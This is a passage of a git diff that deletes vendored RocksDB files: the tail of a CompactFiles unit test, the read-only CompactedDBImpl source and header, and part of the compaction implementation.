-    ASSERT_EQ(0, meta.levels[0].level);
-    if (file1 == "") {
-      file1 = file.db_path + "/" + file.name;
-    } else {
-      std::string file2 = file.db_path + "/" + file.name;
-      // Another thread starts a compact files and creates an L0 compaction
-      // The background compaction then notices that there is an L0 compaction
-      // already in progress and doesn't do an L0 compaction
-      // Once the background compaction finishes, the compact files finishes
-      ASSERT_OK(
-          db->CompactFiles(rocksdb::CompactionOptions(), {file1, file2}, 0));
-      break;
-    }
-  }
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  delete db;
-}
-
-TEST_F(CompactFilesTest, ObsoleteFiles) {
-  Options options;
-  // to trigger compaction more easily
-  const int kWriteBufferSize = 65536;
-  options.create_if_missing = true;
-  // Disable RocksDB background compaction.
-  options.compaction_style = kCompactionStyleNone;
-  options.level0_slowdown_writes_trigger = (1 << 30);
-  options.level0_stop_writes_trigger = (1 << 30);
-  options.write_buffer_size = kWriteBufferSize;
-  options.max_write_buffer_number = 2;
-  options.compression = kNoCompression;
-
-  // Add listener
-  FlushedFileCollector* collector = new FlushedFileCollector();
-  options.listeners.emplace_back(collector);
-
-  DB* db = nullptr;
-  DestroyDB(db_name_, options);
-  Status s = DB::Open(options, db_name_, &db);
-  assert(s.ok());
-  assert(db);
-
-  // create couple files
-  for (int i = 1000; i < 2000; ++i) {
-    db->Put(WriteOptions(), ToString(i),
-            std::string(kWriteBufferSize / 10, 'a' + (i % 26)));
-  }
-
-  auto l0_files = collector->GetFlushedFiles();
-  ASSERT_OK(db->CompactFiles(CompactionOptions(), l0_files, 1));
-  reinterpret_cast<DBImpl*>(db)->TEST_WaitForCompact();
-
-  // verify all compaction input files are deleted
-  for (auto fname : l0_files) {
-    ASSERT_EQ(Status::NotFound(), env_->FileExists(fname));
-  }
-  delete db;
-}
-
-TEST_F(CompactFilesTest, NotCutOutputOnLevel0) {
-  Options options;
-  options.create_if_missing = true;
-  // Disable RocksDB background compaction.
-  options.compaction_style = kCompactionStyleNone;
-  options.level0_slowdown_writes_trigger = 1000;
-  options.level0_stop_writes_trigger = 1000;
-  options.write_buffer_size = 65536;
-  options.max_write_buffer_number = 2;
-  options.compression = kNoCompression;
-  options.max_compaction_bytes = 5000;
-
-  // Add listener
-  FlushedFileCollector* collector = new FlushedFileCollector();
-  options.listeners.emplace_back(collector);
-
-  DB* db = nullptr;
-  DestroyDB(db_name_, options);
-  Status s = DB::Open(options, db_name_, &db);
-  assert(s.ok());
-  assert(db);
-
-  // create couple files
-  for (int i = 0; i < 500; ++i) {
-    db->Put(WriteOptions(), ToString(i), std::string(1000, 'a' + (i % 26)));
-  }
-  reinterpret_cast<DBImpl*>(db)->TEST_WaitForFlushMemTable();
-  auto l0_files_1 = collector->GetFlushedFiles();
-  collector->ClearFlushedFiles();
-  for (int i = 0; i < 500; ++i) {
-    db->Put(WriteOptions(), ToString(i), std::string(1000, 'a' + (i % 26)));
-  }
-  reinterpret_cast<DBImpl*>(db)->TEST_WaitForFlushMemTable();
-  auto l0_files_2 = collector->GetFlushedFiles();
-  ASSERT_OK(db->CompactFiles(CompactionOptions(), l0_files_1, 0));
-  ASSERT_OK(db->CompactFiles(CompactionOptions(), l0_files_2, 0));
-  // no assertion failure
-  delete db;
-}
-
-TEST_F(CompactFilesTest, CapturingPendingFiles) {
-  Options options;
-  options.create_if_missing = true;
-  // Disable RocksDB background compaction.
-  options.compaction_style = kCompactionStyleNone;
-  // Always do full scans for obsolete files (needed to reproduce the issue).
-  options.delete_obsolete_files_period_micros = 0;
-
-  // Add listener.
-  FlushedFileCollector* collector = new FlushedFileCollector();
-  options.listeners.emplace_back(collector);
-
-  DB* db = nullptr;
-  DestroyDB(db_name_, options);
-  Status s = DB::Open(options, db_name_, &db);
-  assert(s.ok());
-  assert(db);
-
-  // Create 5 files.
-  for (int i = 0; i < 5; ++i) {
-    db->Put(WriteOptions(), "key" + ToString(i), "value");
-    db->Flush(FlushOptions());
-  }
-
-  auto l0_files = collector->GetFlushedFiles();
-  EXPECT_EQ(5, l0_files.size());
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"CompactFilesImpl:2", "CompactFilesTest.CapturingPendingFiles:0"},
-      {"CompactFilesTest.CapturingPendingFiles:1", "CompactFilesImpl:3"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Start compacting files.
-  rocksdb::port::Thread compaction_thread(
-      [&] { EXPECT_OK(db->CompactFiles(CompactionOptions(), l0_files, 1)); });
-
-  // In the meantime flush another file.
-  TEST_SYNC_POINT("CompactFilesTest.CapturingPendingFiles:0");
-  db->Put(WriteOptions(), "key5", "value");
-  db->Flush(FlushOptions());
-  TEST_SYNC_POINT("CompactFilesTest.CapturingPendingFiles:1");
-
-  compaction_thread.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  delete db;
-
-  // Make sure we can reopen the DB.
-  s = DB::Open(options, db_name_, &db);
-  ASSERT_TRUE(s.ok());
-  assert(db);
-  delete db;
-}
-
-TEST_F(CompactFilesTest, CompactionFilterWithGetSv) {
-  class FilterWithGet : public CompactionFilter {
-   public:
-    virtual bool Filter(int level, const Slice& key, const Slice& value,
-                        std::string* new_value,
-                        bool* value_changed) const override {
-      if (db_ == nullptr) {
-        return true;
-      }
-      std::string res;
-      db_->Get(ReadOptions(), "", &res);
-      return true;
-    }
-
-    void SetDB(DB* db) {
-      db_ = db;
-    }
-
-    virtual const char* Name() const override { return "FilterWithGet"; }
-
-   private:
-    DB* db_;
-  };
-
-
-  std::shared_ptr<FilterWithGet> cf(new FilterWithGet());
-
-  Options options;
-  options.create_if_missing = true;
-  options.compaction_filter = cf.get();
-
-  DB* db = nullptr;
-  DestroyDB(db_name_, options);
-  Status s = DB::Open(options, db_name_, &db);
-  ASSERT_OK(s);
-
-  cf->SetDB(db);
-
-  // Write one L0 file
-  db->Put(WriteOptions(), "K1", "V1");
-  db->Flush(FlushOptions());
-
-  // Compact all L0 files using CompactFiles
-  rocksdb::ColumnFamilyMetaData meta;
-  db->GetColumnFamilyMetaData(&meta);
-  for (auto& file : meta.levels[0].files) {
-    std::string fname = file.db_path + "/" + file.name;
-    ASSERT_OK(
-        db->CompactFiles(rocksdb::CompactionOptions(), {fname}, 0));
-  }
-
-
-  delete db;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as DBImpl::CompactFiles is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/compacted_db_impl.cc b/thirdparty/rocksdb/db/compacted_db_impl.cc
deleted file mode 100644
index d1007d9..0000000
--- a/thirdparty/rocksdb/db/compacted_db_impl.cc
+++ /dev/null
@@ -1,166 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "db/compacted_db_impl.h"
-#include "db/db_impl.h"
-#include "db/version_set.h"
-#include "table/get_context.h"
-
-namespace rocksdb {
-
-extern void MarkKeyMayExist(void* arg);
-extern bool SaveValue(void* arg, const ParsedInternalKey& parsed_key,
-                      const Slice& v, bool hit_and_return);
-
-CompactedDBImpl::CompactedDBImpl(
-  const DBOptions& options, const std::string& dbname)
-  : DBImpl(options, dbname) {
-}
-
-CompactedDBImpl::~CompactedDBImpl() {
-}
-
-size_t CompactedDBImpl::FindFile(const Slice& key) {
-  size_t left = 0;
-  size_t right = files_.num_files - 1;
-  while (left < right) {
-    size_t mid = (left + right) >> 1;
-    const FdWithKeyRange& f = files_.files[mid];
-    if (user_comparator_->Compare(ExtractUserKey(f.largest_key), key) < 0) {
-      // Key at "mid.largest" is < "target".  Therefore all
-      // files at or before "mid" are uninteresting.
-      left = mid + 1;
-    } else {
-      // Key at "mid.largest" is >= "target".  Therefore all files
-      // after "mid" are uninteresting.
-      right = mid;
-    }
-  }
-  return right;
-}
-
-Status CompactedDBImpl::Get(const ReadOptions& options, ColumnFamilyHandle*,
-                            const Slice& key, PinnableSlice* value) {
-  GetContext get_context(user_comparator_, nullptr, nullptr, nullptr,
-                         GetContext::kNotFound, key, value, nullptr, nullptr,
-                         nullptr, nullptr);
-  LookupKey lkey(key, kMaxSequenceNumber);
-  files_.files[FindFile(key)].fd.table_reader->Get(
-      options, lkey.internal_key(), &get_context);
-  if (get_context.State() == GetContext::kFound) {
-    return Status::OK();
-  }
-  return Status::NotFound();
-}
-
-std::vector<Status> CompactedDBImpl::MultiGet(const ReadOptions& options,
-    const std::vector<ColumnFamilyHandle*>&,
-    const std::vector<Slice>& keys, std::vector<std::string>* values) {
-  autovector<TableReader*, 16> reader_list;
-  for (const auto& key : keys) {
-    const FdWithKeyRange& f = files_.files[FindFile(key)];
-    if (user_comparator_->Compare(key, ExtractUserKey(f.smallest_key)) < 0) {
-      reader_list.push_back(nullptr);
-    } else {
-      LookupKey lkey(key, kMaxSequenceNumber);
-      f.fd.table_reader->Prepare(lkey.internal_key());
-      reader_list.push_back(f.fd.table_reader);
-    }
-  }
-  std::vector<Status> statuses(keys.size(), Status::NotFound());
-  values->resize(keys.size());
-  int idx = 0;
-  for (auto* r : reader_list) {
-    if (r != nullptr) {
-      PinnableSlice pinnable_val;
-      std::string& value = (*values)[idx];
-      GetContext get_context(user_comparator_, nullptr, nullptr, nullptr,
-                             GetContext::kNotFound, keys[idx], &pinnable_val,
-                             nullptr, nullptr, nullptr, nullptr);
-      LookupKey lkey(keys[idx], kMaxSequenceNumber);
-      r->Get(options, lkey.internal_key(), &get_context);
-      value.assign(pinnable_val.data(), pinnable_val.size());
-      if (get_context.State() == GetContext::kFound) {
-        statuses[idx] = Status::OK();
-      }
-    }
-    ++idx;
-  }
-  return statuses;
-}
-
-Status CompactedDBImpl::Init(const Options& options) {
-  mutex_.Lock();
-  ColumnFamilyDescriptor cf(kDefaultColumnFamilyName,
-                            ColumnFamilyOptions(options));
-  Status s = Recover({cf}, true /* read only */, false, true);
-  if (s.ok()) {
-    cfd_ = reinterpret_cast<ColumnFamilyHandleImpl*>(
-              DefaultColumnFamily())->cfd();
-    delete cfd_->InstallSuperVersion(new SuperVersion(), &mutex_);
-  }
-  mutex_.Unlock();
-  if (!s.ok()) {
-    return s;
-  }
-  NewThreadStatusCfInfo(cfd_);
-  version_ = cfd_->GetSuperVersion()->current;
-  user_comparator_ = cfd_->user_comparator();
-  auto* vstorage = version_->storage_info();
-  if (vstorage->num_non_empty_levels() == 0) {
-    return Status::NotSupported("no file exists");
-  }
-  const LevelFilesBrief& l0 = vstorage->LevelFilesBrief(0);
-  // L0 should not have files
-  if (l0.num_files > 1) {
-    return Status::NotSupported("L0 contain more than 1 file");
-  }
-  if (l0.num_files == 1) {
-    if (vstorage->num_non_empty_levels() > 1) {
-      return Status::NotSupported("Both L0 and other level contain files");
-    }
-    files_ = l0;
-    return Status::OK();
-  }
-
-  for (int i = 1; i < vstorage->num_non_empty_levels() - 1; ++i) {
-    if (vstorage->LevelFilesBrief(i).num_files > 0) {
-      return Status::NotSupported("Other levels also contain files");
-    }
-  }
-
-  int level = vstorage->num_non_empty_levels() - 1;
-  if (vstorage->LevelFilesBrief(level).num_files > 0) {
-    files_ = vstorage->LevelFilesBrief(level);
-    return Status::OK();
-  }
-  return Status::NotSupported("no file exists");
-}
-
-Status CompactedDBImpl::Open(const Options& options,
-                             const std::string& dbname, DB** dbptr) {
-  *dbptr = nullptr;
-
-  if (options.max_open_files != -1) {
-    return Status::InvalidArgument("require max_open_files = -1");
-  }
-  if (options.merge_operator.get() != nullptr) {
-    return Status::InvalidArgument("merge operator is not supported");
-  }
-  DBOptions db_options(options);
-  std::unique_ptr<CompactedDBImpl> db(new CompactedDBImpl(db_options, dbname));
-  Status s = db->Init(options);
-  if (s.ok()) {
-    ROCKS_LOG_INFO(db->immutable_db_options_.info_log,
-                   "Opened the db as fully compacted mode");
-    LogFlush(db->immutable_db_options_.info_log);
-    *dbptr = db.release();
-  }
-  return s;
-}
-
-}   // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/compacted_db_impl.h b/thirdparty/rocksdb/db/compacted_db_impl.h
deleted file mode 100644
index de32f21..0000000
--- a/thirdparty/rocksdb/db/compacted_db_impl.h
+++ /dev/null
@@ -1,102 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include "db/db_impl.h"
-#include <vector>
-#include <string>
-
-namespace rocksdb {
-
-class CompactedDBImpl : public DBImpl {
- public:
-  CompactedDBImpl(const DBOptions& options, const std::string& dbname);
-  virtual ~CompactedDBImpl();
-
-  static Status Open(const Options& options, const std::string& dbname,
-                     DB** dbptr);
-
-  // Implementations of the DB interface
-  using DB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override;
-  using DB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>&,
-      const std::vector<Slice>& keys, std::vector<std::string>* values)
-    override;
-
-  using DBImpl::Put;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  using DBImpl::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  using DBImpl::Delete;
-  virtual Status Delete(const WriteOptions& options,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  virtual Status Write(const WriteOptions& options,
-                       WriteBatch* updates) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  using DBImpl::CompactRange;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* begin, const Slice* end) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-
-  virtual Status DisableFileDeletions() override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  virtual Status EnableFileDeletions(bool force) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  virtual Status GetLiveFiles(std::vector<std::string>&,
-                              uint64_t* manifest_file_size,
-                              bool flush_memtable = true) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  using DBImpl::Flush;
-  virtual Status Flush(const FlushOptions& options,
-                       ColumnFamilyHandle* column_family) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  using DB::IngestExternalFile;
-  virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& ingestion_options) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-
- private:
-  friend class DB;
-  inline size_t FindFile(const Slice& key);
-  Status Init(const Options& options);
-
-  ColumnFamilyData* cfd_;
-  Version* version_;
-  const Comparator* user_comparator_;
-  LevelFilesBrief files_;
-
-  // No copying allowed
-  CompactedDBImpl(const CompactedDBImpl&);
-  void operator=(const CompactedDBImpl&);
-};
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/compaction.cc b/thirdparty/rocksdb/db/compaction.cc
deleted file mode 100644
index 706eb3b..0000000
--- a/thirdparty/rocksdb/db/compaction.cc
+++ /dev/null
@@ -1,480 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/compaction.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <vector>
-
-#include "db/column_family.h"
-#include "rocksdb/compaction_filter.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-uint64_t TotalFileSize(const std::vector<FileMetaData*>& files) {
-  uint64_t sum = 0;
-  for (size_t i = 0; i < files.size() && files[i]; i++) {
-    sum += files[i]->fd.GetFileSize();
-  }
-  return sum;
-}
-
-void Compaction::SetInputVersion(Version* _input_version) {
-  input_version_ = _input_version;
-  cfd_ = input_version_->cfd();
-
-  cfd_->Ref();
-  input_version_->Ref();
-  edit_.SetColumnFamily(cfd_->GetID());
-}
-
-void Compaction::GetBoundaryKeys(
-    VersionStorageInfo* vstorage,
-    const std::vector<CompactionInputFiles>& inputs, Slice* smallest_user_key,
-    Slice* largest_user_key) {
-  bool initialized = false;
-  const Comparator* ucmp = vstorage->InternalComparator()->user_comparator();
-  for (size_t i = 0; i < inputs.size(); ++i) {
-    if (inputs[i].files.empty()) {
-      continue;
-    }
-    if (inputs[i].level == 0) {
-      // we need to consider all files on level 0
-      for (const auto* f : inputs[i].files) {
-        const Slice& start_user_key = f->smallest.user_key();
-        if (!initialized ||
-            ucmp->Compare(start_user_key, *smallest_user_key) < 0) {
-          *smallest_user_key = start_user_key;
-        }
-        const Slice& end_user_key = f->largest.user_key();
-        if (!initialized ||
-            ucmp->Compare(end_user_key, *largest_user_key) > 0) {
-          *largest_user_key = end_user_key;
-        }
-        initialized = true;
-      }
-    } else {
-      // we only need to consider the first and last file
-      const Slice& start_user_key = inputs[i].files[0]->smallest.user_key();
-      if (!initialized ||
-          ucmp->Compare(start_user_key, *smallest_user_key) < 0) {
-        *smallest_user_key = start_user_key;
-      }
-      const Slice& end_user_key = inputs[i].files.back()->largest.user_key();
-      if (!initialized || ucmp->Compare(end_user_key, *largest_user_key) > 0) {
-        *largest_user_key = end_user_key;
-      }
-      initialized = true;
-    }
-  }
-}
-
-// helper function to determine if compaction is creating files at the
-// bottommost level
-bool Compaction::IsBottommostLevel(
-    int output_level, VersionStorageInfo* vstorage,
-    const std::vector<CompactionInputFiles>& inputs) {
-  if (inputs[0].level == 0 &&
-      inputs[0].files.back() != vstorage->LevelFiles(0).back()) {
-    return false;
-  }
-
-  Slice smallest_key, largest_key;
-  GetBoundaryKeys(vstorage, inputs, &smallest_key, &largest_key);
-
-  // Checks whether there are files living beyond the output_level.
-  // If lower levels have files, it checks for overlap between files
-  // if the compaction process and those files.
-  // Bottomlevel optimizations can be made if there are no files in
-  // lower levels or if there is no overlap with the files in
-  // the lower levels.
-  for (int i = output_level + 1; i < vstorage->num_levels(); i++) {
-    // It is not the bottommost level if there are files in higher
-    // levels when the output level is 0 or if there are files in
-    // higher levels which overlap with files to be compacted.
-    // output_level == 0 means that we want it to be considered
-    // s the bottommost level only if the last file on the level
-    // is a part of the files to be compacted - this is verified by
-    // the first if condition in this function
-    if (vstorage->NumLevelFiles(i) > 0 &&
-        (output_level == 0 ||
-         vstorage->OverlapInLevel(i, &smallest_key, &largest_key))) {
-      return false;
-    }
-  }
-  return true;
-}
-
-// test function to validate the functionality of IsBottommostLevel()
-// function -- determines if compaction with inputs and storage is bottommost
-bool Compaction::TEST_IsBottommostLevel(
-    int output_level, VersionStorageInfo* vstorage,
-    const std::vector<CompactionInputFiles>& inputs) {
-  return IsBottommostLevel(output_level, vstorage, inputs);
-}
-
-bool Compaction::IsFullCompaction(
-    VersionStorageInfo* vstorage,
-    const std::vector<CompactionInputFiles>& inputs) {
-  size_t num_files_in_compaction = 0;
-  size_t total_num_files = 0;
-  for (int l = 0; l < vstorage->num_levels(); l++) {
-    total_num_files += vstorage->NumLevelFiles(l);
-  }
-  for (size_t i = 0; i < inputs.size(); i++) {
-    num_files_in_compaction += inputs[i].size();
-  }
-  return num_files_in_compaction == total_num_files;
-}
-
-Compaction::Compaction(VersionStorageInfo* vstorage,
-                       const ImmutableCFOptions& _immutable_cf_options,
-                       const MutableCFOptions& _mutable_cf_options,
-                       std::vector<CompactionInputFiles> _inputs,
-                       int _output_level, uint64_t _target_file_size,
-                       uint64_t _max_compaction_bytes, uint32_t _output_path_id,
-                       CompressionType _compression,
-                       std::vector<FileMetaData*> _grandparents,
-                       bool _manual_compaction, double _score,
-                       bool _deletion_compaction,
-                       CompactionReason _compaction_reason)
-    : input_vstorage_(vstorage),
-      start_level_(_inputs[0].level),
-      output_level_(_output_level),
-      max_output_file_size_(_target_file_size),
-      max_compaction_bytes_(_max_compaction_bytes),
-      immutable_cf_options_(_immutable_cf_options),
-      mutable_cf_options_(_mutable_cf_options),
-      input_version_(nullptr),
-      number_levels_(vstorage->num_levels()),
-      cfd_(nullptr),
-      output_path_id_(_output_path_id),
-      output_compression_(_compression),
-      deletion_compaction_(_deletion_compaction),
-      inputs_(std::move(_inputs)),
-      grandparents_(std::move(_grandparents)),
-      score_(_score),
-      bottommost_level_(IsBottommostLevel(output_level_, vstorage, inputs_)),
-      is_full_compaction_(IsFullCompaction(vstorage, inputs_)),
-      is_manual_compaction_(_manual_compaction),
-      is_trivial_move_(false),
-      compaction_reason_(_compaction_reason) {
-  MarkFilesBeingCompacted(true);
-  if (is_manual_compaction_) {
-    compaction_reason_ = CompactionReason::kManualCompaction;
-  }
-
-#ifndef NDEBUG
-  for (size_t i = 1; i < inputs_.size(); ++i) {
-    assert(inputs_[i].level > inputs_[i - 1].level);
-  }
-#endif
-
-  // setup input_levels_
-  {
-    input_levels_.resize(num_input_levels());
-    for (size_t which = 0; which < num_input_levels(); which++) {
-      DoGenerateLevelFilesBrief(&input_levels_[which], inputs_[which].files,
-                                &arena_);
-    }
-  }
-
-  GetBoundaryKeys(vstorage, inputs_, &smallest_user_key_, &largest_user_key_);
-}
-
-Compaction::~Compaction() {
-  if (input_version_ != nullptr) {
-    input_version_->Unref();
-  }
-  if (cfd_ != nullptr) {
-    if (cfd_->Unref()) {
-      delete cfd_;
-    }
-  }
-}
-
-bool Compaction::InputCompressionMatchesOutput() const {
-  int base_level = input_vstorage_->base_level();
-  bool matches = (GetCompressionType(immutable_cf_options_, input_vstorage_,
-                                     mutable_cf_options_, start_level_,
-                                     base_level) == output_compression_);
-  if (matches) {
-    TEST_SYNC_POINT("Compaction::InputCompressionMatchesOutput:Matches");
-    return true;
-  }
-  TEST_SYNC_POINT("Compaction::InputCompressionMatchesOutput:DidntMatch");
-  return matches;
-}
-
-bool Compaction::IsTrivialMove() const {
-  // Avoid a move if there is lots of overlapping grandparent data.
-  // Otherwise, the move could create a parent file that will require
-  // a very expensive merge later on.
-  // If start_level_== output_level_, the purpose is to force compaction
-  // filter to be applied to that level, and thus cannot be a trivial move.
-
-  // Check if start level have files with overlapping ranges
-  if (start_level_ == 0 && input_vstorage_->level0_non_overlapping() == false) {
-    // We cannot move files from L0 to L1 if the files are overlapping
-    return false;
-  }
-
-  if (is_manual_compaction_ &&
-      (immutable_cf_options_.compaction_filter != nullptr ||
-       immutable_cf_options_.compaction_filter_factory != nullptr)) {
-    // This is a manual compaction and we have a compaction filter that should
-    // be executed, we cannot do a trivial move
-    return false;
-  }
-
-  // Used in universal compaction, where trivial move can be done if the
-  // input files are non overlapping
-  if ((immutable_cf_options_.compaction_options_universal.allow_trivial_move) &&
-      (output_level_ != 0)) {
-    return is_trivial_move_;
-  }
-
-  if (!(start_level_ != output_level_ && num_input_levels() == 1 &&
-          input(0, 0)->fd.GetPathId() == output_path_id() &&
-          InputCompressionMatchesOutput())) {
-    return false;
-  }
-
-  // assert inputs_.size() == 1
-
-  for (const auto& file : inputs_.front().files) {
-    std::vector<FileMetaData*> file_grand_parents;
-    if (output_level_ + 1 >= number_levels_) {
-      continue;
-    }
-    input_vstorage_->GetOverlappingInputs(output_level_ + 1, &file->smallest,
-                                          &file->largest, &file_grand_parents);
-    const auto compaction_size =
-        file->fd.GetFileSize() + TotalFileSize(file_grand_parents);
-    if (compaction_size > max_compaction_bytes_) {
-      return false;
-    }
-  }
-
-  return true;
-}
-
-void Compaction::AddInputDeletions(VersionEdit* out_edit) {
-  for (size_t which = 0; which < num_input_levels(); which++) {
-    for (size_t i = 0; i < inputs_[which].size(); i++) {
-      out_edit->DeleteFile(level(which), inputs_[which][i]->fd.GetNumber());
-    }
-  }
-}
-
-bool Compaction::KeyNotExistsBeyondOutputLevel(
-    const Slice& user_key, std::vector<size_t>* level_ptrs) const {
-  assert(input_version_ != nullptr);
-  assert(level_ptrs != nullptr);
-  assert(level_ptrs->size() == static_cast<size_t>(number_levels_));
-  if (cfd_->ioptions()->compaction_style == kCompactionStyleLevel) {
-    if (output_level_ == 0) {
-      return false;
-    }
-    // Maybe use binary search to find right entry instead of linear search?
-    const Comparator* user_cmp = cfd_->user_comparator();
-    for (int lvl = output_level_ + 1; lvl < number_levels_; lvl++) {
-      const std::vector<FileMetaData*>& files =
-          input_vstorage_->LevelFiles(lvl);
-      for (; level_ptrs->at(lvl) < files.size(); level_ptrs->at(lvl)++) {
-        auto* f = files[level_ptrs->at(lvl)];
-        if (user_cmp->Compare(user_key, f->largest.user_key()) <= 0) {
-          // We've advanced far enough
-          if (user_cmp->Compare(user_key, f->smallest.user_key()) >= 0) {
-            // Key falls in this file's range, so definitely
-            // exists beyond output level
-            return false;
-          }
-          break;
-        }
-      }
-    }
-    return true;
-  } else {
-    return bottommost_level_;
-  }
-}
-
-// Mark (or clear) each file that is being compacted
-void Compaction::MarkFilesBeingCompacted(bool mark_as_compacted) {
-  for (size_t i = 0; i < num_input_levels(); i++) {
-    for (size_t j = 0; j < inputs_[i].size(); j++) {
-      assert(mark_as_compacted ? !inputs_[i][j]->being_compacted
-                               : inputs_[i][j]->being_compacted);
-      inputs_[i][j]->being_compacted = mark_as_compacted;
-    }
-  }
-}
-
-// Sample output:
-// If compacting 3 L0 files, 2 L3 files and 1 L4 file, and outputting to L5,
-// print: "3@0 + 2@3 + 1@4 files to L5"
-const char* Compaction::InputLevelSummary(
-    InputLevelSummaryBuffer* scratch) const {
-  int len = 0;
-  bool is_first = true;
-  for (auto& input_level : inputs_) {
-    if (input_level.empty()) {
-      continue;
-    }
-    if (!is_first) {
-      len +=
-          snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len, " + ");
-    } else {
-      is_first = false;
-    }
-    len += snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len,
-                    "%" ROCKSDB_PRIszt "@%d", input_level.size(),
-                    input_level.level);
-  }
-  snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len,
-           " files to L%d", output_level());
-
-  return scratch->buffer;
-}
-
-uint64_t Compaction::CalculateTotalInputSize() const {
-  uint64_t size = 0;
-  for (auto& input_level : inputs_) {
-    for (auto f : input_level.files) {
-      size += f->fd.GetFileSize();
-    }
-  }
-  return size;
-}
-
-void Compaction::ReleaseCompactionFiles(Status status) {
-  MarkFilesBeingCompacted(false);
-  cfd_->compaction_picker()->ReleaseCompactionFiles(this, status);
-}
-
-void Compaction::ResetNextCompactionIndex() {
-  assert(input_version_ != nullptr);
-  input_vstorage_->ResetNextCompactionIndex(start_level_);
-}
-
-namespace {
-int InputSummary(const std::vector<FileMetaData*>& files, char* output,
-                 int len) {
-  *output = '\0';
-  int write = 0;
-  for (size_t i = 0; i < files.size(); i++) {
-    int sz = len - write;
-    int ret;
-    char sztxt[16];
-    AppendHumanBytes(files.at(i)->fd.GetFileSize(), sztxt, 16);
-    ret = snprintf(output + write, sz, "%" PRIu64 "(%s) ",
-                   files.at(i)->fd.GetNumber(), sztxt);
-    if (ret < 0 || ret >= sz) break;
-    write += ret;
-  }
-  // if files.size() is non-zero, overwrite the last space
-  return write - !!files.size();
-}
-}  // namespace
-
-void Compaction::Summary(char* output, int len) {
-  int write =
-      snprintf(output, len, "Base version %" PRIu64 " Base level %d, inputs: [",
-               input_version_->GetVersionNumber(), start_level_);
-  if (write < 0 || write >= len) {
-    return;
-  }
-
-  for (size_t level_iter = 0; level_iter < num_input_levels(); ++level_iter) {
-    if (level_iter > 0) {
-      write += snprintf(output + write, len - write, "], [");
-      if (write < 0 || write >= len) {
-        return;
-      }
-    }
-    write +=
-        InputSummary(inputs_[level_iter].files, output + write, len - write);
-    if (write < 0 || write >= len) {
-      return;
-    }
-  }
-
-  snprintf(output + write, len - write, "]");
-}
-
-uint64_t Compaction::OutputFilePreallocationSize() const {
-  uint64_t preallocation_size = 0;
-
-  if (max_output_file_size_ != port::kMaxUint64 &&
-      (cfd_->ioptions()->compaction_style == kCompactionStyleLevel ||
-       output_level() > 0)) {
-    preallocation_size = max_output_file_size_;
-  } else {
-    for (const auto& level_files : inputs_) {
-      for (const auto& file : level_files.files) {
-        preallocation_size += file->fd.GetFileSize();
-      }
-    }
-  }
-  // Over-estimate slightly so we don't end up just barely crossing
-  // the threshold
-  return preallocation_size + (preallocation_size / 10);
-}
-
-std::unique_ptr<CompactionFilter> Compaction::CreateCompactionFilter() const {
-  if (!cfd_->ioptions()->compaction_filter_factory) {
-    return nullptr;
-  }
-
-  CompactionFilter::Context context;
-  context.is_full_compaction = is_full_compaction_;
-  context.is_manual_compaction = is_manual_compaction_;
-  context.column_family_id = cfd_->GetID();
